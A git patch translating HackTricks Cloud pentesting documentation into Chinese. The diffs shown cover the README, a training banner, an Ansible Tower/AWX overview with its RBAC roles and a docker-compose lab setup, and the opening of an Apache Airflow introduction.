From 1e9dcd664bb94327e13c3db3f982470042e28f17 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 31 Dec 2024 20:05:38 +0000 Subject: [PATCH] Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/ --- src/README.md | 16 +- src/SUMMARY.md | 2 + src/banners/hacktricks-training.md | 16 +- ...ower-awx-automation-controller-security.md | 156 ++- .../apache-airflow-security/README.md | 152 ++- .../airflow-configuration.md | 112 +- .../apache-airflow-security/airflow-rbac.md | 32 +- src/pentesting-ci-cd/atlantis-security.md | 286 +++-- src/pentesting-ci-cd/circleci-security.md | 312 +++-- .../cloudflare-security/README.md | 118 +- .../cloudflare-security/cloudflare-domains.md | 138 ++- .../cloudflare-zero-trust-network.md | 46 +- .../concourse-security/README.md | 20 +- .../concourse-architecture.md | 22 +- .../concourse-enumeration-and-attacks.md | 312 +++-- .../concourse-lab-creation.md | 144 ++- src/pentesting-ci-cd/gitea-security/README.md | 136 +-- .../gitea-security/basic-gitea-information.md | 92 +- .../github-security/README.md | 256 ++-- .../abusing-github-actions/README.md | 578 +++++---- .../gh-actions-artifact-poisoning.md | 5 - .../gh-actions-cache-poisoning.md | 7 +- .../gh-actions-context-script-injections.md | 7 +- .../accessible-deleted-data-in-github.md | 40 +- .../basic-github-information.md | 291 +++-- .../jenkins-security/README.md | 318 +++-- .../basic-jenkins-information.md | 62 +- ...itrary-file-read-to-rce-via-remember-me.md | 138 ++- .../jenkins-dumping-secrets-from-groovy.md | 78 +- ...jenkins-rce-creating-modifying-pipeline.md | 40 +- .../jenkins-rce-creating-modifying-project.md | 36 +- .../jenkins-rce-with-groovy-script.md | 38 +- src/pentesting-ci-cd/okta-security/README.md | 112 +- .../okta-security/okta-hardening.md | 196 ++-- .../pentesting-ci-cd-methodology.md | 96 +- .../serverless.com-security.md | 1028 ++++++++--------- src/pentesting-ci-cd/supabase-security.md | 112 +- src/pentesting-ci-cd/terraform-security.md | 294 +++-- src/pentesting-ci-cd/todo.md | 8 +- .../travisci-security/README.md | 54 +- .../basic-travisci-information.md | 64 +- src/pentesting-ci-cd/vercel-security.md | 540 +++++---- src/pentesting-cloud/aws-security/README.md | 204 ++-- .../aws-basic-information/README.md | 392 +++---- .../aws-federation-abuse.md | 158 ++- .../aws-permissions-for-a-pentest.md | 24 +- .../aws-security/aws-persistence/README.md | 7 +- .../aws-api-gateway-persistence.md | 20 +- .../aws-cognito-persistence.md | 30 +- .../aws-dynamodb-persistence.md | 62 +- .../aws-persistence/aws-ec2-persistence.md | 52 +- .../aws-persistence/aws-ecr-persistence.md | 104 +- .../aws-persistence/aws-ecs-persistence.md | 102 +- .../aws-persistence/aws-efs-persistence.md | 16 +- .../aws-elastic-beanstalk-persistence.md | 80 +- .../aws-persistence/aws-iam-persistence.md | 56 +- .../aws-persistence/aws-kms-persistence.md | 30 +- .../aws-lambda-persistence/README.md | 52 +- .../aws-abusing-lambda-extensions.md | 36 +- .../aws-lambda-layers-persistence.md | 98 +- .../aws-lightsail-persistence.md | 30 +- .../aws-persistence/aws-rds-persistence.md | 22 +- .../aws-persistence/aws-s3-persistence.md | 18 +- .../aws-secrets-manager-persistence.md | 50 +- .../aws-persistence/aws-sns-persistence.md | 120 +- .../aws-persistence/aws-sqs-persistence.md | 44 +- .../aws-persistence/aws-ssm-perssitence.md | 5 - .../aws-step-functions-persistence.md | 10 +- .../aws-persistence/aws-sts-persistence.md | 134 +-- .../aws-post-exploitation/README.md | 7 +- .../aws-api-gateway-post-exploitation.md | 76 +- .../aws-cloudfront-post-exploitation.md | 28 +- .../aws-codebuild-post-exploitation/README.md | 54 +- .../aws-codebuild-token-leakage.md | 206 ++-- .../aws-control-tower-post-exploitation.md | 10 +- .../aws-dlm-post-exploitation.md | 154 ++- .../aws-dynamodb-post-exploitation.md | 292 ++--- .../README.md | 602 +++++----- .../aws-ebs-snapshot-dump.md | 72 +- .../aws-malicious-vpc-mirror.md | 12 +- .../aws-ecr-post-exploitation.md | 56 +- .../aws-ecs-post-exploitation.md | 44 +- .../aws-efs-post-exploitation.md | 34 +- .../aws-eks-post-exploitation.md | 138 +-- ...aws-elastic-beanstalk-post-exploitation.md | 48 +- .../aws-iam-post-exploitation.md | 98 +- .../aws-kms-post-exploitation.md | 140 +-- .../aws-lambda-post-exploitation/README.md | 16 +- .../aws-warm-lambda-persistence.md | 50 +- .../aws-lightsail-post-exploitation.md | 22 +- .../aws-organizations-post-exploitation.md | 8 +- .../aws-rds-post-exploitation.md | 58 +- .../aws-s3-post-exploitation.md | 34 +- .../aws-secrets-manager-post-exploitation.md | 40 +- .../aws-ses-post-exploitation.md | 48 +- .../aws-sns-post-exploitation.md | 46 +- .../aws-sqs-post-exploitation.md | 50 +- ...sso-and-identitystore-post-exploitation.md | 12 +- .../aws-stepfunctions-post-exploitation.md | 42 +- .../aws-sts-post-exploitation.md | 50 +- .../aws-vpn-post-exploitation.md | 8 +- .../aws-privilege-escalation/README.md | 20 +- .../aws-apigateway-privesc.md | 52 +- .../aws-chime-privesc.md | 6 +- .../aws-cloudformation-privesc/README.md | 94 +- ...stack-and-cloudformation-describestacks.md | 124 +- .../aws-codebuild-privesc.md | 250 ++-- .../aws-codepipeline-privesc.md | 20 +- .../aws-codestar-privesc/README.md | 60 +- ...ateproject-codestar-associateteammember.md | 146 ++- .../iam-passrole-codestar-createproject.md | 106 +- .../aws-cognito-privesc.md | 274 ++--- .../aws-datapipeline-privesc.md | 82 +- .../aws-directory-services-privesc.md | 22 +- .../aws-dynamodb-privesc.md | 8 +- .../aws-ebs-privesc.md | 16 +- .../aws-ec2-privesc.md | 206 ++-- .../aws-ecr-privesc.md | 108 +- .../aws-ecs-privesc.md | 230 ++-- .../aws-efs-privesc.md | 90 +- .../aws-elastic-beanstalk-privesc.md | 140 +-- .../aws-emr-privesc.md | 44 +- .../aws-privilege-escalation/aws-gamelift.md | 12 +- .../aws-glue-privesc.md | 48 +- .../aws-iam-privesc.md | 194 ++-- .../aws-kms-privesc.md | 124 +- .../aws-lambda-privesc.md | 216 ++-- .../aws-lightsail-privesc.md | 110 +- .../aws-mediapackage-privesc.md | 14 +- .../aws-mq-privesc.md | 26 +- .../aws-msk-privesc.md | 14 +- .../aws-organizations-prinvesc.md | 12 +- .../aws-rds-privesc.md | 116 +- .../aws-redshift-privesc.md | 48 +- .../aws-s3-privesc.md | 222 ++-- .../aws-sagemaker-privesc.md | 80 +- .../aws-secrets-manager-privesc.md | 40 +- .../aws-sns-privesc.md | 24 +- .../aws-sqs-privesc.md | 24 +- .../aws-ssm-privesc.md | 72 +- .../aws-sso-and-identitystore-privesc.md | 78 +- .../aws-stepfunctions-privesc.md | 282 ++--- .../aws-sts-privesc.md | 122 +- .../aws-workdocs-privesc.md | 26 +- .../eventbridgescheduler-privesc.md | 48 +- ...acm-pca-issuecertificate-acm-pca-getcer.md | 26 +- .../aws-security/aws-services/README.md | 42 +- .../aws-services/aws-api-gateway-enum.md | 178 ++- ...m-and-private-certificate-authority-pca.md | 20 +- .../aws-cloudformation-and-codestar-enum.md | 22 +- .../aws-services/aws-cloudfront-enum.md | 20 +- .../aws-services/aws-cloudhsm-enum.md | 69 +- .../aws-services/aws-codebuild-enum.md | 32 +- .../aws-services/aws-cognito-enum/README.md | 38 +- .../cognito-identity-pools.md | 122 +- .../aws-cognito-enum/cognito-user-pools.md | 444 ++++--- ...e-codepipeline-codebuild-and-codecommit.md | 40 +- .../aws-directory-services-workdocs-enum.md | 70 +- .../aws-services/aws-documentdb-enum.md | 14 +- .../aws-services/aws-dynamodb-enum.md | 104 +- .../README.md | 166 ++- .../aws-nitro-enum.md | 170 ++- ...ws-vpc-and-networking-basic-information.md | 212 ++-- .../aws-security/aws-services/aws-ecr-enum.md | 68 +- .../aws-security/aws-services/aws-ecs-enum.md | 50 +- .../aws-security/aws-services/aws-efs-enum.md | 96 +- .../aws-security/aws-services/aws-eks-enum.md | 22 +- .../aws-elastic-beanstalk-enum.md | 76 +- .../aws-services/aws-elasticache.md | 8 +- .../aws-security/aws-services/aws-emr-enum.md | 58 +- .../aws-security/aws-services/aws-iam-enum.md | 132 +-- .../aws-kinesis-data-firehose-enum.md | 22 +- .../aws-security/aws-services/aws-kms-enum.md | 154 ++- .../aws-services/aws-lambda-enum.md | 86 +- .../aws-services/aws-lightsail-enum.md | 24 +- .../aws-security/aws-services/aws-mq-enum.md | 32 +- .../aws-security/aws-services/aws-msk-enum.md | 26 +- .../aws-services/aws-organizations-enum.md | 24 +- .../aws-services/aws-other-services-enum.md | 14 +- .../aws-services/aws-redshift-enum.md | 38 +- .../aws-relational-database-rds-enum.md | 102 +- .../aws-services/aws-route53-enum.md | 18 +- .../aws-s3-athena-and-glacier-enum.md | 246 ++-- .../aws-services/aws-secrets-manager-enum.md | 22 +- .../README.md | 7 +- .../aws-cloudtrail-enum.md | 246 ++-- .../aws-cloudwatch-enum.md | 386 +++---- .../aws-config-enum.md | 52 +- .../aws-control-tower-enum.md | 24 +- .../aws-cost-explorer-enum.md | 16 +- .../aws-detective-enum.md | 8 +- .../aws-firewall-manager-enum.md | 202 ++-- .../aws-guardduty-enum.md | 130 +-- .../aws-inspector-enum.md | 244 ++-- .../aws-macie-enum.md | 82 +- .../aws-security-hub-enum.md | 36 +- .../aws-shield-enum.md | 12 +- .../aws-trusted-advisor-enum.md | 94 +- .../aws-waf-enum.md | 402 +++---- .../aws-security/aws-services/aws-ses-enum.md | 46 +- .../aws-security/aws-services/aws-sns-enum.md | 50 +- .../aws-services/aws-sqs-and-sns-enum.md | 20 +- .../aws-services/aws-stepfunctions-enum.md | 358 +++--- .../aws-security/aws-services/aws-sts-enum.md | 86 +- .../aws-services/eventbridgescheduler-enum.md | 40 +- .../aws-unauthenticated-enum-access/README.md | 64 +- .../aws-accounts-unauthenticated-enum.md | 28 +- .../aws-api-gateway-unauthenticated-enum.md | 62 +- .../aws-cloudfront-unauthenticated-enum.md | 8 +- .../aws-codebuild-unauthenticated-access.md | 22 +- .../aws-cognito-unauthenticated-enum.md | 40 +- .../aws-documentdb-enum.md | 10 +- .../aws-dynamodb-unauthenticated-access.md | 10 +- .../aws-ec2-unauthenticated-enum.md | 30 +- .../aws-ecr-unauthenticated-enum.md | 22 +- .../aws-ecs-unauthenticated-enum.md | 14 +- ...-elastic-beanstalk-unauthenticated-enum.md | 18 +- .../aws-elasticsearch-unauthenticated-enum.md | 8 +- .../aws-iam-and-sts-unauthenticated-enum.md | 186 ++- ...ity-center-and-sso-unauthenticated-enum.md | 98 +- .../aws-iot-unauthenticated-enum.md | 10 +- .../aws-kinesis-video-unauthenticated-enum.md | 8 +- .../aws-lambda-unauthenticated-access.md | 20 +- .../aws-media-unauthenticated-enum.md | 10 +- .../aws-mq-unauthenticated-enum.md | 16 +- .../aws-msk-unauthenticated-enum.md | 14 +- .../aws-rds-unauthenticated-enum.md | 22 +- .../aws-redshift-unauthenticated-enum.md | 8 +- .../aws-s3-unauthenticated-enum.md | 174 ++- .../aws-sns-unauthenticated-enum.md | 14 +- .../aws-sqs-unauthenticated-enum.md | 16 +- src/pentesting-cloud/azure-security/README.md | 136 +-- .../az-basic-information/README.md | 494 ++++---- .../az-tokens-and-public-applications.md | 188 ++- .../azure-security/az-device-registration.md | 72 +- .../azure-security/az-enumeration-tools.md | 82 +- .../az-arc-vulnerable-gpo-deploy-script.md | 44 +- .../az-local-cloud-credentials.md | 42 +- .../az-pass-the-certificate.md | 36 +- .../az-pass-the-cookie.md | 22 +- ...g-primary-refresh-token-microsoft-entra.md | 8 +- .../az-primary-refresh-token-prt.md | 6 +- .../az-processes-memory-access-token.md | 20 +- .../az-permissions-for-a-pentest.md | 6 +- .../pentesting-cloud-methodology.md | 218 ++-- 245 files changed, 10145 insertions(+), 12880 deletions(-) diff --git a/src/README.md b/src/README.md index 01b146fd1..35cd94e16 100644 --- a/src/README.md +++ b/src/README.md @@ -1,31 +1,31 @@ # HackTricks Cloud -Reading time: {{ #reading_time }} +阅读时间: {{ #reading_time }} {{#include ./banners/hacktricks-training.md}}
-_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Hacktricks 标志和动画设计由_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ > [!TIP] -> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. +> 欢迎来到这个页面,在这里你将找到我在 **CTFs**、**真实**生活**环境**、**研究**和**阅读**研究和新闻中学到的每一个与 **CI/CD & Cloud** 相关的 **黑客技巧/技术/其他**。 ### **Pentesting CI/CD Methodology** -**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** +**在 HackTricks CI/CD 方法论中,你将找到如何对与 CI/CD 活动相关的基础设施进行渗透测试。** 阅读以下页面以获取 **介绍:** [pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) ### Pentesting Cloud Methodology -**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** +**在 HackTricks Cloud 方法论中,你将找到如何对云环境进行渗透测试。** 阅读以下页面以获取 **介绍:** [pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) ### License & Disclaimer -**Check them in:** +**请查看:** [HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) @@ -34,7 +34,3 @@ _Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.co ![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) {{#include ./banners/hacktricks-training.md}} - - - - diff --git a/src/SUMMARY.md b/src/SUMMARY.md index feae5163c..1b1d60c58 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -505,3 +505,5 @@ + + diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md index b684cee3d..50f6953db 100644 --- a/src/banners/hacktricks-training.md +++ b/src/banners/hacktricks-training.md @@ -1,17 +1,13 @@ > [!TIP] -> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +> 学习和实践 AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +> 学习和实践 GCP Hacking:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) > >
> -> Support HackTricks +> 支持 HackTricks > -> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +> - 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +> - **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +> - **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 > >
- - - - diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md index d3fbf19e5..094f41ce0 100644 --- a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md +++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md @@ -2,62 +2,61 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansible’s user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Tower’s REST API and command-line interface make it simple to integrate it into current tools and workflows. +**Ansible Tower** 或其开源版本 [**AWX**](https://github.com/ansible/awx) 也被称为 **Ansible 的用户界面、仪表板和 REST API**。通过 **基于角色的访问控制**、作业调度和图形化库存管理,您可以通过现代用户界面管理您的 Ansible 基础设施。Tower 的 REST API 和命令行界面使其易于集成到当前工具和工作流程中。 -**Automation Controller is a newer** version of Ansible Tower with more capabilities. +**Automation Controller 是 Ansible Tower 的一个更新版本,具有更多功能。** -### Differences +### 差异 -According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows. +根据 [**这篇文章**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00),Ansible Tower 和 AWX 之间的主要区别在于获得的支持,Ansible Tower 具有额外的功能,如基于角色的访问控制、对自定义 API 的支持和用户定义的工作流程。 -### Tech Stack +### 技术栈 -- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs. -- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface. -- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data. -- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners. -- **Redis**: Redis serves as a cache and a backend for the task queue. +- **Web 界面**:这是用户可以管理库存、凭据、模板和作业的图形界面。它旨在直观,并提供可视化以帮助理解自动化作业的状态和结果。 +- **REST API**:您可以在 Web 界面中执行的所有操作,也可以通过 REST API 执行。这意味着您可以将 AWX/Tower 与其他系统集成或编写通常在界面中执行的操作脚本。 +- **数据库**:AWX/Tower 使用数据库(通常是 PostgreSQL)来存储其配置、作业结果和其他必要的操作数据。 +- **RabbitMQ**:这是 AWX/Tower 用于在不同组件之间通信的消息系统,特别是在 Web 服务和任务运行器之间。 +- **Redis**:Redis 作为缓存和任务队列的后端。 -### Logical Components +### 逻辑组件 -- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc. -- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed.. -- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job. -- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run. -- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials. -- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events. -- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc. -- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed. +- **库存**:库存是一个 **主机(或节点)的集合**,可以对其 **运行作业**(Ansible 剧本)。AWX/Tower 允许您定义和分组库存,并支持动态库存,可以 **从其他系统获取主机列表**,如 AWS、Azure 等。 +- **项目**:项目本质上是一个 **Ansible 剧本的集合**,来源于 **版本控制系统**(如 Git),以便在需要时提取最新的剧本。 +- **模板**:作业模板定义 **特定剧本将如何运行**,指定 **库存**、**凭据** 和其他 **参数**。 +- **凭据**:AWX/Tower 提供了一种安全的方式来 **管理和存储秘密,如 SSH 密钥、密码和 API 令牌**。这些凭据可以与作业模板关联,以便剧本在运行时具有必要的访问权限。 +- **任务引擎**:这是魔法发生的地方。任务引擎基于 Ansible 构建,负责 **运行剧本**。作业被分派到任务引擎,然后使用指定的凭据在指定的库存上运行 Ansible 剧本。 +- **调度程序和回调**:这些是 AWX/Tower 中的高级功能,允许 **作业在特定时间调度运行**或由外部事件触发。 +- **通知**:AWX/Tower 可以根据作业的成功或失败发送通知。它支持多种通知方式,如电子邮件、Slack 消息、Webhooks 等。 +- **Ansible 剧本**:Ansible 剧本是配置、部署和编排工具。它们以自动化、可重复的方式描述系统的期望状态。剧本使用 YAML 编写,利用 Ansible 的声明性自动化语言描述需要执行的配置、任务和步骤。 -### Job Execution Flow +### 作业执行流程 -1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower. -2. **Job Initiation**: - - The user, via the Web Interface or API, initiates a job based on a **Job Template**. - - The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**. - - Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution. -3. **Job Queuing**: - - **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ. - - **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution. -4. **Job Execution**: - - The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials. - - Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**. - - As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**. -5. **Job Results**: - - Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**. - - Users can then view the results through the Web Interface or query them via the REST API. - - Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc. -6. **External Systems Integration**: - - **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more. - - **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution. - - **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times. +1. **用户交互**:用户可以通过 **Web 界面** 或 **REST API** 与 AWX/Tower 交互。这些提供了对 AWX/Tower 提供的所有功能的前端访问。 +2. **作业启动**: + - 用户通过 Web 界面或 API 启动基于 **作业模板** 的作业。 + - 作业模板包括对 **库存**、**项目**(包含剧本)和 **凭据** 的引用。 + - 在作业启动时,向 AWX/Tower 后端发送请求以将作业排队执行。 +3. **作业排队**: + - **RabbitMQ** 处理 Web 组件与任务运行器之间的消息传递。一旦作业启动,消息将通过 RabbitMQ 发送到任务引擎。 + - **Redis** 作为任务队列的后端,管理等待执行的排队作业。 +4. **作业执行**: + - **任务引擎** 拾取排队的作业。它从 **数据库** 中检索与作业相关的剧本、库存和凭据的必要信息。 + - 使用从相关 **项目** 中检索的 Ansible 剧本,任务引擎在指定的 **库存** 节点上使用提供的 **凭据** 运行剧本。 + - 当剧本运行时,其执行输出(日志、事实等)被捕获并存储在 **数据库** 中。 +5. **作业结果**: + - 一旦剧本完成运行,结果(成功、失败、日志)将保存到 **数据库** 中。 + - 用户可以通过 Web 界面查看结果或通过 REST API 查询结果。 + - 根据作业结果,可以发送 **通知** 以告知用户或外部系统作业的状态。通知可以是电子邮件、Slack 消息、Webhooks 等。 +6. **外部系统集成**: + - **库存** 可以从外部系统动态获取,允许 AWX/Tower 从 AWS、Azure、VMware 等来源提取主机。 + - **项目**(剧本)可以从版本控制系统中提取,确保在作业执行期间使用最新的剧本。 + - **调度程序和回调** 可用于与其他系统或工具集成,使 AWX/Tower 对外部触发器做出反应或在预定时间运行作业。 -### AWX lab creation for testing - -[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX: +### AWX 实验室创建以进行测试 +[**按照文档**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) 可以使用 docker-compose 运行 AWX: ```bash git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version @@ -83,61 +82,56 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser # Load demo data docker exec tools_awx_1 awx-manage create_preload_data ``` - ## RBAC -### Supported roles +### 支持的角色 -The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**. +最特权的角色称为 **System Administrator**。拥有此角色的任何人都可以 **修改任何内容**。 -From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one. +从 **白盒安全** 审查的角度来看,您需要 **System Auditor role**,该角色允许 **查看所有系统数据** 但不能进行任何更改。另一个选择是获取 **Organization Auditor role**,但获取前者会更好。
-Expand this to get detailed description of available roles +展开以获取可用角色的详细描述 1. **System Administrator**: - - This is the superuser role with permissions to access and modify any resource in the system. - - They can manage all organizations, teams, projects, inventories, job templates, etc. +- 这是具有访问和修改系统中任何资源权限的超级用户角色。 +- 他们可以管理所有组织、团队、项目、库存、作业模板等。 2. **System Auditor**: - - Users with this role can view all system data but cannot make any changes. - - This role is designed for compliance and oversight. +- 拥有此角色的用户可以查看所有系统数据,但不能进行任何更改。 +- 此角色旨在用于合规性和监督。 3. **Organization Roles**: - - **Admin**: Full control over the organization's resources. - - **Auditor**: View-only access to the organization's resources. - - **Member**: Basic membership in an organization without any specific permissions. - - **Execute**: Can run job templates within the organization. - - **Read**: Can view the organization’s resources. +- **Admin**: 对组织资源的完全控制。 +- **Auditor**: 仅查看组织资源的访问权限。 +- **Member**: 在组织中的基本成员身份,没有任何特定权限。 +- **Execute**: 可以在组织内运行作业模板。 +- **Read**: 可以查看组织的资源。 4. **Project Roles**: - - **Admin**: Can manage and modify the project. - - **Use**: Can use the project in a job template. - - **Update**: Can update project using SCM (source control). +- **Admin**: 可以管理和修改项目。 +- **Use**: 可以在作业模板中使用该项目。 +- **Update**: 可以使用 SCM(源代码管理)更新项目。 5. **Inventory Roles**: - - **Admin**: Can manage and modify the inventory. - - **Ad Hoc**: Can run ad hoc commands on the inventory. - - **Update**: Can update the inventory source. - - **Use**: Can use the inventory in a job template. - - **Read**: View-only access. +- **Admin**: 可以管理和修改库存。 +- **Ad Hoc**: 可以在库存上运行临时命令。 +- **Update**: 可以更新库存源。 +- **Use**: 可以在作业模板中使用库存。 +- **Read**: 仅查看访问权限。 6. **Job Template Roles**: - - **Admin**: Can manage and modify the job template. - - **Execute**: Can run the job. - - **Read**: View-only access. +- **Admin**: 可以管理和修改作业模板。 +- **Execute**: 可以运行作业。 +- **Read**: 仅查看访问权限。 7. **Credential Roles**: - - **Admin**: Can manage and modify the credentials. - - **Use**: Can use the credentials in job templates or other relevant resources. - - **Read**: View-only access. +- **Admin**: 可以管理和修改凭据。 +- **Use**: 可以在作业模板或其他相关资源中使用凭据。 +- **Read**: 仅查看访问权限。 8. **Team Roles**: - - **Member**: Part of the team but without any specific permissions. - - **Admin**: Can manage the team's members and associated resources. +- **Member**: 团队的一部分,但没有任何特定权限。 +- **Admin**: 可以管理团队成员和相关资源。 9. **Workflow Roles**: - - **Admin**: Can manage and modify the workflow. - - **Execute**: Can run the workflow. - - **Read**: View-only access. +- **Admin**: 可以管理和修改工作流。 +- **Execute**: 可以运行工作流。 +- **Read**: 仅查看访问权限。
{{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/README.md b/src/pentesting-ci-cd/apache-airflow-security/README.md index aac46128c..03870395f 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/README.md +++ b/src/pentesting-ci-cd/apache-airflow-security/README.md @@ -2,22 +2,21 @@ {{#include ../../banners/hacktricks-training.md}} -### Basic Information +### 基本信息 -[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications. +[**Apache Airflow**](https://airflow.apache.org) 是一个用于 **编排和调度数据管道或工作流** 的平台。在数据管道的上下文中,“编排”一词指的是安排、协调和管理来自各种来源的复杂数据工作流的过程。这些编排的数据管道的主要目的是提供经过处理和可消费的数据集。这些数据集被广泛应用于众多应用程序,包括但不限于商业智能工具、数据科学和机器学习模型,所有这些都是大数据应用程序正常运行的基础。 -Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**. +基本上,Apache Airflow 允许您 **在发生某些事情时调度代码的执行**(事件,cron)。 -### Local Lab +### 本地实验室 #### Docker-Compose -You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). +您可以使用来自 [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) 的 **docker-compose 配置文件** 启动一个完整的 Apache Airflow Docker 环境。(如果您使用的是 MacOS,请确保为 Docker 虚拟机分配至少 6GB 的内存)。 #### 